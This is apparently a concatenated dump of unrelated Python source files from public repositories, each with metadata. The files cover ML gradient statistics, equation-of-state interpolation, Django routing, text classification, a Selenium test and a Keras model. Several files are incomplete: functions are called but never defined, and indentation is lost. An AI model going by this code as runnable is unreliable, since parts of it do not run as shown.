'magnitude': _reduce(grads_mean.abs()),
'snr': _reduce(grads_snr),
'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0.,
'keep_ratio': mask.sum() / torch.ones_like(mask).sum()
},
'snr': {
'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50),
'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05),
'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(),
'max': grads_snr.max(), 'mean': grads_snr.mean()}
})
if oracle_grad is not None:
output['grads']['direction'] = grads_dir.mean()
# additional data: raw grads, and mean,var,snr for each parameter separately
meta = {
'grads': all_grads,
'expected': grads_mean,
'magnitude': grads_mean.abs(),
'var': grads_variance,
'snr': grads_snr,
}
return output, meta
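# Minimal sketch (illustrative only): the parameter-wise SNR reported above is simply
# |E[g_d]| / sqrt(Var[g_d]) computed across the Monte-Carlo samples of the gradient.
def _example_parameter_wise_snr(all_grads: Tensor, eps: float = 1e-15) -> Tensor:
    # all_grads has shape [mc_samples, D]: one gradient estimate per row
    mean = all_grads.mean(0)
    variance = all_grads.var(0)
    return mean.abs() / variance.clamp(min=eps).pow(0.5)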
avg_line_length: 42.545064 | max_line_length: 125 | alphanum_fraction: 0.611924
hexsha: 904a907ab750687eb1de030da0541431f23b5d88 | size: 1,081 | ext: py | lang: Python | path: Sem-09-T1-Q5.py | repo: daianasousa/Semana-09 | head_hexsha: decfc9b47931ae4f5a4f30a0d26b931ecd548f59 | licenses: ["MIT"] | stars: null | issues: null | forks: null
if __name__ == '__main__':
    main()
avg_line_length: 30.885714 | max_line_length: 138 | alphanum_fraction: 0.543941
hexsha: 5f3a8ec38dd614e2783df50d617c5b8f3ca8b0f8 | size: 1,428 | ext: py | lang: Python | path: data_split.py | repo: CodeDogandCat/ChineseGrammarErrorDiagnose | head_hexsha: 4e1ec745ae938f742c6afb0e88b08ea50c6028cb | licenses: ["Apache-2.0"] | stars: null | issues: null | forks: null
# -*- coding: utf-8 -*-
import re
# from pyltp import Segmentor
import jieba.posseg as pseg
import jieba
import os
import sys
import json
import math
# import kenlm
import nltk
from collections import Counter
# dataSplit('TNewsSegafter2.txt', 32)
dataSplit('TNewsSegafter1.txt', 32)
avg_line_length: 28 | max_line_length: 81 | alphanum_fraction: 0.621148
hexsha: 5f3bba72b50ee67716dbeda71e53db5b079da28f | size: 2,435 | ext: py | lang: Python | path: Code/Python/pract_fund1_sol.py | stars/issues repo: kunal-mulki/Materials | forks repo: NYUDataBootcamp/Materials | head_hexsha: b76bba123002972e4063b9b24cd5dc3d980e16e9 | licenses: ["MIT"] | stars: 27 (2016-12-07T17:38:41.000Z to 2021-06-28T06:19:49.000Z) | issues: 27 (2016-05-28T21:32:24.000Z to 2016-12-08T16:47:09.000Z) | forks: 50 (2016-10-12T11:04:50.000Z to 2021-06-01T23:24:45.000Z)
"""
Practice problems, Python fundamentals 1 -- Solutions
@authors: Balint Szoke, Daniel Csaba
@date: 06/02/2017
"""
#-------------------------------------------------------
# 1) Solution
good_string = "Sarah's code"
#or
good_string = """Sarah's code"""
#-------------------------------------------------------
# 2) Solution
i = 1234
list(str(i))
#-------------------------------------------------------
# 3) Solution
year = '2016'
next_year = str(int(year) + 1)
#-------------------------------------------------------
# 4) Solution
x, y = 3, 'hello'
print(x, y)
z = x
x = y
y = z
print(x, y)
#-------------------------------------------------------
# 5) Solution
name = 'Jones'
print(name.upper())
#-------------------------------------------------------
# 6) Solution
name = 'Ulysses'
print(name.count('s'))
#-------------------------------------------------------
# 7) Solution
long_string = 'salamandroid'
long_string = long_string.replace('a', '*')
print(long_string)
#-------------------------------------------------------
# 8) Solution
ll = [1, 2, 3, 4, 5]
ll.reverse()
print(ll)
#ll.pop(1)
# or better
ll.pop(ll.index(4))
print(ll)
ll.append(1.5)
print(ll)
ll.sort()
print(ll)
#%% #-------------------------------------------------------
# 9) Solution
number = "32,054.23"
number_no_comma = number.replace(',', '')
number_float = float(number_no_comma)
print(number_float)
#or
print(float(number.replace(',', '')))
#-------------------------------------------------------
# 10) Solution
firstname_lastname = 'john_doe'
firstname, lastname = firstname_lastname.split('_')
Firstname = firstname.capitalize()
Lastname = lastname.capitalize()
print(Firstname, Lastname)
#-------------------------------------------------------
# 11-12) Solution
l = [0, 1, 2, 4, 5]
index = l.index(4)
l.insert(index, 3)
print(l)
#-------------------------------------------------------
# 13) Solution
s = 'www.example.com'
s = s.lstrip('w.')
s = s.rstrip('.c')
# or in a single line
(s.lstrip('w.')).rstrip('.com')
#-------------------------------------------------------
# 14) Solution
link = 'https://play.spotify.com/collection/albums'
splitted_link = link.rsplit('/', 1)
print(splitted_link[0])
#or
link.rsplit('/', 1)[0]
#-------------------------------------------------------
# 15) Solution
amount = "32.054,23"
ms = amount.maketrans(',.', '.,')
amount = amount.translate(ms)
print(amount)
avg_line_length: 21.936937 | max_line_length: 62 | alphanum_fraction: 0.433265
hexsha: 5f3df5f78e78d0ee2fc42ec4cf3a85208b508f67 | size: 7,178 | ext: py | lang: Python | path: eos/old_scott_ANEOS_conversion.py | repo: ScottHull/FDPS_SPH | head_hexsha: 6db11d599d433f889da100e78c17d6f65365ceda | licenses: ["MIT"] | stars: null | issues: null | forks: null
"""
This is a python script that converts u(rho, T), P(rho, T), Cs(rho,T), S(rho, T)
to T(rho, u), P(rho, u), Cs(rho, u), S(rho, u), which is more useful for SPH calculations
"""
import matplotlib.pyplot as plt
from collections import OrderedDict
import numpy as np
import pandas as pd
import csv
import sys
from scipy.interpolate import interp1d
from scipy import interpolate
def recalculateEnergies(d, grid_number, min_energy, delta):
"""
For each density sample, we want the same exponential energy grid
:param d:
:param grid_number:
:param min_energy:
:param delta:
:return:
"""
densities = d.keys()
new_energies = []
for i in range(0, grid_number):
new_energy = min_energy * (delta**i)
new_energies.append(new_energy)
for i in densities:
d[i].update({'Energy (J/kg)': new_energies})
return d
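# Worked example (values illustrative, not taken from the script): recalculateEnergies lays
# the energies on a geometric grid e_i = e_min * delta**i, so five points starting at 1.0e5
# with delta = 1.1 are 1.0e5, 1.1e5, 1.21e5, 1.331e5 and 1.4641e5.
def _example_energy_grid(min_energy=1.0e5, delta=1.1, grid_number=5):
    return [min_energy * (delta ** i) for i in range(grid_number)]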
nu = 120 # number of the grid for the internal energy (exponential)
infile_path = 'granite.table.csv'
empty_lines = emptyLineIndices(f=infile_path)
sorted_dict = chunkFile(f=infile_path, emtpy_lines=empty_lines)
densities = sorted_dict.keys()
infile_df = pd.read_csv(infile_path)
energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
min_energy = min(energy)
max_energy = max(energy)
delta = (min_energy / max_energy)**(1/(nu-1))
sorted_dict = recalculateEnergies(d=sorted_dict, grid_number=nu, min_energy=min_energy, delta=delta)
for i in densities:
energies = sorted_dict[i]['Energy (J/kg)']
temperatures = sorted_dict[i]['Temperature (K)']
pressures = sorted_dict[i]['Pressure (Pa)']
sound_speeds = sorted_dict[i]['Sound speed (m/s)']
entropies = sorted_dict[i]['Entropy (J/kg/K)']
f_temperature = interpolate.interp1d(energies, temperatures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Temperature (K)': f_temperature(energies)})
f_pressure = interpolate.interp1d(temperatures, pressures, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Pressure (Pa)': f_pressure(sorted_dict[i]['Temperature (K)'])})
f_soundspeed = interpolate.interp1d(temperatures, sound_speeds, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Sound speed (m/s)': f_soundspeed(sorted_dict[i]['Temperature (K)'])})
f_entropy = interpolate.interp1d(temperatures, entropies, kind='linear', fill_value='extrapolate')
sorted_dict[i].update({'Entropy (J/kg/K)': f_entropy(sorted_dict[i]['Temperature (K)'])})
# infile_df = pd.read_csv(infile_path)
#
# density = sorted(list(set([reformat(i) for i in list(infile_df['Density (kg/m3)'])]))) # remove duplicates, then sort
# temperature = sorted(list(set([reformat(i) for i in list(infile_df['Temperature (K)'])])))
# energy = [reformat(i) for i in list(infile_df['Energy (J/kg)'])]
# pressure = [reformat(i) for i in list(infile_df['Pressure (Pa)'])]
# sound_speed = [reformat(i) for i in list(infile_df['Sound speed (m/s)'])]
# entropy = [reformat(i) for i in list(infile_df['Entropy (J/kg/K)'])]
#
# min_energy = min(energy)
# max_energy = max(energy)
# delta = (min_energy / max_energy)**(1 / (nu - 1))
#
# new_energy = [min_energy * (delta**i) for i in range(0, nu)]
#
# new_temperature = []
# new_pressure = []
# new_sound_speed = []
# new_entropy = []
#
# for m in range(0, nu):
#
# # internal energy
# f_temperature = interpolate.interp1d(energy[m:], temperature[m:], kind='linear', fill_value='extrapolate')
# new_temperature.append(f_temperature(new_energy))
#
# # pressure
# f_pressure = interpolate.interp1d(temperature[m:], pressure[m:], kind='linear', fill_value='extrapolate')
# new_pressure.append(f_pressure(new_temperature[m]))
#
# # sound speed
# f_soundspeed = interpolate.interp1d(temperature[m:], sound_speed[m:], kind='linear', fill_value='extrapolate')
# new_sound_speed.append(f_soundspeed(new_temperature[m]))
#
# # entropy
# f_entropy = interpolate.interp1d(temperature[m:], entropy[m:], kind='linear', fill_value='extrapolate')
# new_entropy.append(f_entropy(new_temperature[m]))
#
# new_temperature = np.array(new_temperature)
# new_pressure = np.array(new_pressure)
# new_sound_speed = np.array(new_sound_speed)
# new_entropy = np.array(new_entropy)
#
# for m in range(0, len(density), int(len(density)/6)):
#
# ax = [0, 0, 0, 0]
#
# fig = plt.figure(figsize = (10,6.128))
#
# ax[0] = fig.add_subplot(221)
# ax[1] = fig.add_subplot(222)
# ax[2] = fig.add_subplot(223)
# ax[3] = fig.add_subplot(224)
#
# ax[0].semilogy(np.array(temperature) * 1e-3, np.array(energy[m:]) * 1e-6, '--', label="original ANEOS")
# ax[0].semilogy(new_temperature[m:] * 1e-3, np.array(new_energy[m:]) * 1e-6, '-.', label="modified")
# ax[1].semilogy(np.array(temperature) * 1e-3, np.array(pressure[m:]) * 1e-6,'--', new_temperature[m:] * 1e-3, new_pressure[m:] * 1e-6,'-.')
# ax[2].plot(np.array(temperature) * 1e-3, np.array(sound_speed[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_sound_speed[m:] * 1e-3,'-.')
# ax[3].plot(np.array(temperature) * 1e-3, np.array(entropy[m:]) * 1e-3,'--', new_temperature[m:] * 1e-3, new_entropy[m:] * 1e-3,'-.')
#
# ax[0].legend(frameon=False)
#
# ax[0].set_ylabel('Energy (MJ/kg)', fontsize=10)
# ax[1].set_ylabel('Pressure (MPa)', fontsize=10)
# ax[2].set_ylabel('Sound Speed (km/s)', fontsize=10)
# ax[3].set_ylabel('Entropy (kJ/K/kg)', fontsize=10)
# ax[2].set_xlabel('Temperature ($10^3$ K)', fontsize=10)
# ax[3].set_xlabel('Temperature ($10^3$ K)',fontsize=10)
#
# fig.suptitle("Density: %3.3f kg/m$^3$" %(density[m]))
# # plt.show()
# # fig.savefig("Density" + str(m) + ".png")
avg_line_length: 34.344498 | max_line_length: 146 | alphanum_fraction: 0.636389
hexsha: 5f3f44af77a5d9949e7fe7c6858624af3b7fa923 | size: 346 | ext: py | lang: Python | path: scheduler/post_scheduler/urls.py | repo: Awinja-j/Social-Media-post-Scheduler | head_hexsha: 4f95b4bb2ca3f890d3e22bcda859b94ebc483b87 | licenses: ["MIT"] | stars: 1 (2021-05-08T08:21:06.000Z) | issues: null | forks: null
from django.urls import path
from . import views
urlpatterns = [
path('post_posts', views.post_posts),
path('fetch_posts', views.get_posts),
path('fetch_post/<pk>', views.get_post),
path('delete_post/<pk>', views.delete_post),
path('edit_post/<pk>', views.edit_post),
path('search_for_a_post', views.search_for_a_post)
]
avg_line_length: 28.833333 | max_line_length: 54 | alphanum_fraction: 0.699422
hexsha: 5f3fad78b868dac1b90ecb78a5594353e0e31396 | size: 506 | ext: py | lang: Python | path: dato-graphlab/src/config.py | repo: warreee/apache-flink_vs_dato-graphlab | head_hexsha: cd01cee208461479d3f27489ab45df439b8b9820 | licenses: ["Apache-2.0"] | stars: null | issues: null | forks: null
import os
avg_line_length: 16.322581 | max_line_length: 63 | alphanum_fraction: 0.666008
hexsha: 5f42caff296a8e9070523febb1d633e533ecbfff | size: 950 | ext: py | lang: Python | path: tools.py | repo: chougousui/keyboard_layout_for_mobile | head_hexsha: 3bb59169f10ac56fb82cb62be07f821f1ecac22e | licenses: ["MIT"] | stars: 5 (2019-06-12T09:29:06.000Z to 2020-12-31T08:53:19.000Z) | issues: null | forks: null
import numpy as np
avg_line_length: 29.6875 | max_line_length: 119 | alphanum_fraction: 0.489474
hexsha: 5f43a06d91c00b879b94bd9ca11de4d7d8fcab07 | size: 377 | ext: py | lang: Python | path: full-stack/backend/django-app/django-jwt-app/settings/urls.py | repo: mp5maker/library | head_hexsha: b4d2eea70ae0da9d917285569031edfb4d8ab9fc | licenses: ["MIT"] | stars: null | issues: 23 (2020-08-15T15:18:32.000Z to 2022-02-26T13:49:05.000Z) | forks: null
from django.contrib import admin
from django.urls import path, include
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('token-auth/', obtain_jwt_token),
path('token-refresh/', refresh_jwt_token),
path('employee/', include('employee.urls', namespace='employee'))
]
avg_line_length: 22.176471 | max_line_length: 70 | alphanum_fraction: 0.710875
hexsha: 5f45037068a6ca19658fc2ba430b609e4386fc29 | size: 15,989 | ext: py | lang: Python | path: models/train_classifier.py | repo: tarcisobraz/disaster-message-clf | head_hexsha: 22de03350a0f993005564a1d07a43da6bd989e67 | licenses: ["DOC"] | stars: null | issues: null | forks: null
#General libs
import sys
import os
import json
from datetime import datetime
import time
#Data wrangling libs
import pandas as pd
import numpy as np
#DB related libs
from sqlalchemy import create_engine
#ML models related libs
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.metrics import classification_report
from sklearn.model_selection import GridSearchCV
from sklearn.linear_model import LogisticRegression
#Gensim
from gensim.models import KeyedVectors
#Custom Transformers and Estimators
import nlp_estimators
#Model Saver
import dill
#Workspace Utils
from workspace_utils import active_session
#Glove Models dictionary (to be filled in when needed)
glove_models_by_size = {50: None,
100: None,
300: None}
#Train Configurations to be filled in when script is called
train_configs = {}
def get_or_load_glove_model(num_dims):
'''
INPUT
num_dims - int, number of dimensions of the Glove model to be loaded
OUTPUT
glove_model - object, the pre-trained glove model with the specified number of dimensions
This function either retrieves the already-stored glove model or loads and
stores it from file using the train configuration `glove_models_folderpath`
'''
if glove_models_by_size[num_dims] == None:
print('Pre-trained Glove Model with {} dims not found. '\
'\nLoading it from file...'.format(num_dims))
glove_models_by_size[num_dims] = KeyedVectors.load_word2vec_format(
os.path.join(train_configs['glove_models_folderpath'],
'glove.6B.{}d_word2vec.txt'.format(num_dims)),
binary=False)
return glove_models_by_size[num_dims]
def load_data(database_filepath):
'''
INPUT
database_filepath - string, filepath of database from which data will be loaded
OUTPUT
X - numpy array, The raw messages ready to be used to train the pipelines
X_tokenized - numpy array, The tokenized messages ready to be used to train the pipelines
Y - numpy array, The list of categories to which each message belongs
category_columns - pandas series, The names of the categories
categories_tokens - numpy array, The tokenized categories names (to be used by cats_sim feature set)
This function loads and prepares data for the models training
'''
engine = create_engine('sqlite:///' + database_filepath)
messages_df = pd.read_sql_table(con=engine, table_name='Message')
categories_df = pd.read_sql_table(con=engine, table_name='CorpusWide')
messages_tokens = pd.read_sql_table(con=engine, table_name='MessageTokens')
X = messages_df.message.values
X_tokenized = messages_tokens.tokens_str.values
Y_df = categories_df.drop(['message_id', 'message', 'original', 'genre'], axis=1)
Y = Y_df.values
category_columns = Y_df.columns
categories_tokens = np.array([np.array(cat.split('_')) for cat in category_columns])
return X, X_tokenized, Y, category_columns, categories_tokens
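# Illustrative sketch (the database path is hypothetical): typical call pattern for load_data.
def _example_load_data():
    X, X_tokenized, Y, category_columns, categories_tokens = \
        load_data('../data/DisasterResponse.db')
    return X_tokenized.shape, Y.shape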
def build_estimator_obj(estimator_code):
'''
INPUT
estimator_code - string, the code of the classifier object to be built
OUTPUT
classifier_obj - sklearn estimator, the built classifier object
This function builds a classifier object based on the estimator code received as input.
For unexpected codes, it prints an error and exits the script execution
'''
classifier_obj = None
if estimator_code == 'rf':
classifier_obj = RandomForestClassifier()
elif estimator_code == 'lr':
classifier_obj = LogisticRegression()
else:
print("Invalid Classifier Estimator Code " + estimator_code)
exit(1)
return classifier_obj
def build_classifiers_build_params(classifiers_configs):
'''
INPUT
classifiers_configs - dict, a dictionary containing the configuration for each classifier
OUTPUT
classifiers_params_dict - dict, a dictionary containing the grid params to be used for
each classifier in the training process
This function builds a dictionary with grid params to be used in training process for each
classifier whose configurations were given as input.
It can handle a single classifier or a list of classifiers.
'''
if len(classifiers_configs) > 1:
classifiers_params_list = []
classifiers_params_dict = {}
for classifier in classifiers_configs:
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj.set_params(**classifier['params']))
classifiers_params_list.append(classifier_obj)
classifiers_params_dict['clf'] = classifiers_params_list
elif len(classifiers_configs) == 1:
classifier = classifiers_configs[0]
classifier_estimator = classifier['estimator']
classifier_obj = build_estimator_obj(classifier_estimator)
classifier_obj = MultiOutputClassifier(classifier_obj)
classifiers_params_dict = {'clf' : [classifier_obj]}
classifiers_params_dict.update(classifier['params'])
print(classifiers_params_dict)
return classifiers_params_dict
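# Illustrative configuration (hypothetical values): the classifier configs consumed above are
# plain dictionaries, e.g. a single logistic-regression entry with its grid values. Passing it
# to build_classifiers_build_params yields {'clf': [MultiOutputClassifier(LogisticRegression())],
# 'clf__estimator__C': [0.1, 1.0, 10.0]}.
_EXAMPLE_CLASSIFIERS_CONFIGS = [
    {'estimator': 'lr',
     'params': {'clf__estimator__C': [0.1, 1.0, 10.0]}}
]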
def build_model(model_config,classifiers_params,categories_tokens):
'''
INPUT
model_config - dict, a dictionary containing the configuration for a model pipeline
classifiers_configs - dict, a dictionary containing the configuration for each classifier
categories_tokens - numpy array, array containing the tokenized categories names
OUTPUT
grid_search_cv - sklearn GridSearchCV, a grid search CV object containing specifications
on how to train the model based on the input configs
This function builds a Grid Search CV object with specifications for training process for a
given model and its classifiers whose configurations were given as input.
It can handle different feature_sets:
- Local Word2Vec
- Pre-Trained Glove
- Doc2Vec
- Category Similarity
- All Features Sets together
'''
feature_set = model_config['feature_set']
print("Building Model for feature set: {}".format(feature_set))
print("Grid Params: {}".format(model_config['grid_params']))
pipeline = grid_search_params = grid_search_cv = None
jobs = -1
score = 'f1_micro'
def_cv = 3
verbosity_level=10
if feature_set == 'local_w2v':
pipeline = Pipeline([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'glove':
pipeline = Pipeline([
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50))),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'glove__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['glove__num_dims']]}
elif feature_set == 'doc2vec':
pipeline = Pipeline([
('doc2vec', nlp_estimators.Doc2VecTransformer()),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
elif feature_set == 'cats_sim':
pipeline = Pipeline([
('cats_sim', nlp_estimators.CategoriesSimilarity(
categories_tokens=categories_tokens)),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = {'cats_sim__word2vec_model' :
[get_or_load_glove_model(num_dims) for num_dims in
model_config['grid_params']['cats_sim__num_dims']]}
elif feature_set == 'all_feats':
pipeline = Pipeline([
('features', FeatureUnion([
('local_w2v', nlp_estimators.TfidfEmbeddingTrainVectorizer(num_dims=50)),
('glove', nlp_estimators.TfidfEmbeddingTrainVectorizer(
get_or_load_glove_model(50)
)),
('doc2vec', nlp_estimators.Doc2VecTransformer(vector_size=50)),
('cats_sim', nlp_estimators.CategoriesSimilarity(categories_tokens=categories_tokens,
word2vec_model=get_or_load_glove_model(50)))
])),
('clf', MultiOutputClassifier(GaussianNB()))
])
grid_search_params = model_config['grid_params']
else:
print("Error: Invalid Feature Set: " + feature_set)
sys.exit(1)
# Adds classifiers params to grid params
grid_search_params.update(classifiers_params)
grid_search_cv = GridSearchCV(estimator=pipeline,
param_grid=grid_search_params,
scoring=score,
cv=def_cv,
n_jobs=jobs,
verbose=verbosity_level)
return grid_search_cv
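# --- Illustrative example (added for clarity, not part of the original script) ---
# A minimal sketch of a `model_config` dictionary as consumed by build_model() and
# run_grid_search(). Only keys read in this script are shown; the values are
# hypothetical placeholders.
_example_model_config = {
    'feature_set': 'doc2vec',                          # one of: local_w2v, glove, doc2vec, cats_sim, all_feats
    'grid_params': {'doc2vec__vector_size': [50]},     # hypothetical pipeline parameter grid
    'model_ouput_filepath': 'models/doc2vec_model.pkl',  # key name as spelled elsewhere in this script
}
# grid_search_cv = build_model(_example_model_config, classifiers_params, categories_tokens)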
def evaluate_model(model, X_test, Y_test, category_names):
'''
INPUT
model - sklearn GridSearchCV, the GridSearch containing the model with best performance on the training set
X_test - numpy array, tokenized messages ready to be used to test the fit pipelines
Y_test - numpy array, array containing the tokenized categories names for the test set
category_names - pandas series, the categories names
OUTPUT
test_score - float, the score of the input model on the test data
This function runs the model with best performance on the training set on the test dataset,
printing the precision, recall and f-1 per category and returning the overall prediction score.
'''
print('Best params: %s' % model.best_params_)
# Best training data accuracy
print('Best training score: %.3f' % model.best_score_)
# Predict on test data with best params
Y_pred = model.predict(X_test)
test_score = model.score(X_test, Y_test)
# Test data accuracy of model with best params
print('Test set score for best params: %.3f ' % test_score)
for category_idx in range(len(category_names)):
print(classification_report(y_pred=Y_pred[:,category_idx],
y_true=Y_test[:,category_idx],
labels=[0,1],
target_names=[category_names[category_idx] + '-0',
category_names[category_idx] + '-1']))
return test_score
def save_model(model, model_filepath):
'''
INPUT
model - sklearn Estimator, the model with best performance on the training set
model_filepath - string, path where the model pickle will be saved
This function saves the model with best performance on the training set to a given filepath.
'''
# Output a pickle file for the model
with open(model_filepath,'wb') as f:
dill.dump(model, f)
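# --- Illustrative counterpart (added for clarity, not part of the original script) ---
# Sketch of how a model saved by save_model() can be loaded back with dill.
def _load_model_example(model_filepath):
    """Load a model pickle previously written by save_model()."""
    with open(model_filepath, 'rb') as f:
        return dill.load(f)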
def build_grid_search_results_df(gs_results, gs_name, test_score):
'''
INPUT
gs_results - dict, dictionary containing the results of GridSearchCV training
gs_name - string, the name of the GridSearchCV feature set
test_score - float, the score of the best performing model of the GridSearchCV on the test set
OUTPUT
gs_results_df - pandas DataFrame, a dataframe holding information of the GridSearchCV results
(train and test) for record
This function builds a dataframe with information of the GridSearchCV results
(train and test) for record.
'''
gs_results_df = pd.DataFrame(gs_results)
gs_results_df['grid_id'] = gs_name
gs_results_df['best_model_test_score'] = test_score
gs_results_df['param_set_order'] = np.arange(len(gs_results_df))
return gs_results_df
def run_grid_search():
'''
This function runs the whole model selection phase:
- Load Data from DB
- Build Model
- Run GridSearch
- Save results to file
- Save best model pickle file
'''
start = time.time()
print("Train configuration:")
print(json.dumps(train_configs, indent=4))
print('Loading data...\n DATABASE: {}'.format(train_configs['database_filepath']))
X, X_tokenized, Y, category_names, categories_tokens = load_data(train_configs['database_filepath'])
X_train, X_test, Y_train, Y_test = train_test_split(X_tokenized, Y, test_size=0.25)
classifiers_params = build_classifiers_build_params(train_configs['classifiers'])
print('Running GridSearch on models parameters...')
best_score = 0.0
best_gs = ''
overall_results_df = pd.DataFrame()
for model_config in train_configs['models']:
print('Building model...')
model = build_model(model_config,
classifiers_params,
categories_tokens)
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
test_score = evaluate_model(model, X_test, Y_test, category_names)
gs_results_df = build_grid_search_results_df(model.cv_results_,
model_config['feature_set'],
test_score)
overall_results_df = pd.concat([overall_results_df, gs_results_df])
print('Saving model...\n MODEL: {}'.format(
model_config['model_ouput_filepath']))
save_model(model.best_estimator_, model_config['model_ouput_filepath'])
print('Trained model saved!')
# Track best (highest test accuracy) model
if test_score > best_score:
best_score = test_score
best_gs = model_config['feature_set']
output_filepath = train_configs['results_folderpath'] + \
'res-' + train_configs['name'] + '-' + \
datetime.now().strftime('%Y-%m-%d_%H:%M:%S') + \
'.csv'
print('Saving Results...\n FILEPATH: {}'.format(output_filepath))
overall_results_df.to_csv(output_filepath, index=False)
print('\nClassifier with best test set accuracy: %s' % best_gs)
end = time.time()
print("Training Time: " + str(int(end - start)) + "s")
if __name__ == '__main__':
main()
| 37.888626 | 117 | 0.659704 |
5f468ef647d08df9b7e435bbbbaaf01ef4277cf4 | 148 | py | Python | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 2 | 2020-04-08T15:31:12.000Z | 2020-07-01T11:04:47.000Z | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 9 | 2018-09-12T09:29:43.000Z | 2020-03-15T09:11:25.000Z | src/cortexpy/test/constants.py | karljohanw/cortexpy | 70dcce771136f98edb5250ad8abd2a46bda7f0a6 | [
"Apache-2.0"
] | 1 | 2019-03-29T10:59:13.000Z | 2019-03-29T10:59:13.000Z | import struct
MAX_UINT = 2 ** (struct.calcsize('I') * 8) - 1
MAX_ULONG = 2 ** (struct.calcsize('L') * 8) - 1
UINT8_T = 1
UINT32_T = 4
UINT64_T = 8
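# Illustrative note (added): on typical CPython builds struct.calcsize('I') == 4,
# so MAX_UINT == 4294967295; calcsize('L') is platform dependent (4 on Windows,
# 8 on most 64-bit Unix builds), so MAX_ULONG is 2**32 - 1 or 2**64 - 1 accordingly.
# assert MAX_UINT == 2 ** 32 - 1   # holds wherever calcsize('I') == 4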
| 18.5 | 47 | 0.614865 |
5f47bfe261a0653163329656400b45e38dc2e334 | 2,103 | py | Python | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | tests/functional_tests/authors/test_authors_login.py | Kaique425/recipes | ab188dbe1ca3891160f65a7858613b8750faa721 | [
"MIT"
] | null | null | null | import pytest
from django.contrib.auth.models import User
from django.urls import reverse
from selenium.webdriver.common.by import By
from .base import AuthorBaseFunctionalTest
| 37.553571 | 85 | 0.661912 |
5f4b11817e6c6f5664fb7eebcff8bd3df9ed5773 | 42 | py | Python | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | varex/__init__.py | weiyi-bitw/varex | 765e8876c0ced480a47c0e523736bd31b7897644 | [
"MIT"
] | null | null | null | from .commons import VCFEntry, LabeledMat
| 21 | 41 | 0.833333 |
5f4ba7ea00a9b4ae2bec68e16163449e185187d1 | 2,612 | py | Python | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 8 | 2020-03-29T01:44:16.000Z | 2022-03-26T23:15:34.000Z | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 60 | 2020-02-08T22:07:16.000Z | 2022-03-26T23:51:55.000Z | simulation/battery/base_battery.py | BillMakwae/Simulation | 8d0ec274643f23bc0e78c96e50508b60791c11d2 | [
"MIT"
] | 1 | 2021-10-20T20:07:06.000Z | 2021-10-20T20:07:06.000Z | from simulation.common import Storage
from simulation.common import BatteryEmptyError
| 39.575758 | 116 | 0.61562 |
5f501af017d1618fd9d8ac7f58bef0af07c22038 | 2,757 | py | Python | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | MLP/Detectar cancer de mama/Cancer_mama_simples.py | alex7alves/Deep-Learning | 7843629d5367f3ea8b15915a7ba3667cf7a65587 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 17 21:04:48 2018
@author: Alex Alves
Program to determine whether a breast tumor is
benign (output 0) or malignant (output 1)
"""
import pandas as pa
# Import used to split the data between network training and validation testing
from sklearn.model_selection import train_test_split
import keras
from keras.models import Sequential
from keras.layers import Dense
from sklearn.metrics import confusion_matrix, accuracy_score
entrada = pa.read_csv('entradas-breast.csv')
esperado = pa.read_csv('saidas-breast.csv')
# Training with 75% of the data and validation with 25%
entrada_treinar, entrada_teste, esperado_treinar,esperado_teste =train_test_split(entrada,esperado,test_size=0.25)
# Creating the neural network
detectar_cancer = Sequential()
# Adding the input layer
detectar_cancer.add(Dense(units=16,activation='relu',kernel_initializer='random_uniform',input_dim=30))
# Adding a hidden layer
